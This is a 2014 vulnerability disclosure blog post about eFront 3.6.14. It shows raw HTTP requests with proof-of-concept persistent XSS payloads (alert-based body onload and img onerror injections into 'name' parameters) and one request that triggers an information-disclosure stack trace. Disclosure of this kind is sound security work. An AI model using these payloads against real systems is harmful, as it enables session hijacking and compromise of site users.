Monday, 24 February 2014

[EN] eFront 3.6.14 Multiple vulnerabilities

Below few findings from yesterday and today...

# ==============================================================
# Title ...| eFront 3.6.14 Multiple vulnerabilities
# Version .| efront_3.6.14_build18016_community.zip
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| www.efrontlearning.net/download‎
# ==============================================================


# ==============================================================
# 1. Information disclosure
---<request>---
POST /k/cms/efront/www/student.php?ctg=personal&user='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&op=profile HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 1975

-----------------------------2032284762831
Content-Disposition: form-data; name="_qf__user_form"
(...)
---<request>---

---<response>---
($('secondlist')) {Sortable.destroy('secondlist');}">
<pre>#0 /home/k/public_html/cms/efront/libraries/includes/personal.php(29): EfrontUserFactory::factory(''>">')
#1 /home/k/public_html/cms/efront/www/student.php(554): include('/home/k/public_...')
#2 {main}</pre>

---<response>---


# ==============================================================
# 2. Persistent XSS (from admin)
---<request>---

POST /k/cms/efront/www/administrator.php?ctg=courses&add_course=1 HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 269

_qf__add_courses_form=&qfS_csrf=c43145eed7151535528a08cf6281dc40&qfS_csrf=c43145eed7151535528a08cf6281dc40&name='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&directions_ID=1&languages_NAME=english&active=0&active=1&show_catalog=0&show_catalog=1&price=0&submit_course=Submit
---<request>---

# ===============================================================
# 3. Persistent XSS (again from admin, and again vulnerable is 'name' parameter)

---<request>---
POST /k/cms/efront/www/administrator.php?ctg=directions&add_direction=1 HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 169

_qf__add_directions_form=&qfS_csrf=bcc380e9b626466a1f0829bc96174833&name=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(9999)%3e")&parent_direction_ID=0&submit_direction=Submit
---<request>---

# ===============================================================
# 4. Persistent xss (name parameter again)

---<request>---
POST /k/cms/efront/www/administrator.php?ctg=user_types&add_user_type=1&basic_type=student HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 607

_qf__add_type_form=&qfS_csrf=9c7ab093513d78bf919b45393b618564&name=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(9999)%3e")&basic_user_type=student&core_access%5Bcontent%5D=change&core_access%5Busers%5D=change&core_access%5Bstatistics%5D=change&core_access%5Bpersonal_messages%5D=change&core_access%5Bcontrol_panel%5D=change&core_access%5Bmove_block%5D=change&core_access%5Bmodule_itself%5D=change&core_access%5Bdashboard%5D=change&core_access%5Binsert_group_key%5D=change&core_access%5Bcalendar%5D=change&core_access%5Bsurveys%5D=change&core_access%5Bnews%5D=change&core_access%5Bforum%5D=change&submit_type=Save
---<request>---



# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

No comments:

Post a comment

What do You think...?